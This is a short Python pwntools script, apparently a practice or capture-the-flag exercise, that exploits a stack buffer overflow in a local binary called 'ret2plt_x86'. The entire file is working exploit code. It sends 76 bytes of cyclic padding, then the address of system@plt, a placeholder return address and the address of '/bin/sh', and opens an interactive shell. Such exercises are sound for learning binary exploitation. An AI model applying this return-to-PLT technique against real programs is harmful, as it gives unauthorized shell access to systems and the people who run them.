from pwn import *

context.log_level = 'DEBUG'

elf = ELF('./ret2plt_x86')

# address of system@plt, if we jump to this address, then goes to system
# 0x8048430
system_plt = elf.plt['system']


sh = process('./ret2plt_x86')

# 76
prefix = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4A"

# now use exit
tmp = 0xf7dff170

# "/bin/sh"
sh_addr = 0xf7f59352


sh.send(prefix + p32(system_plt) + p32(tmp) + p32(sh_addr))

sh.interactive()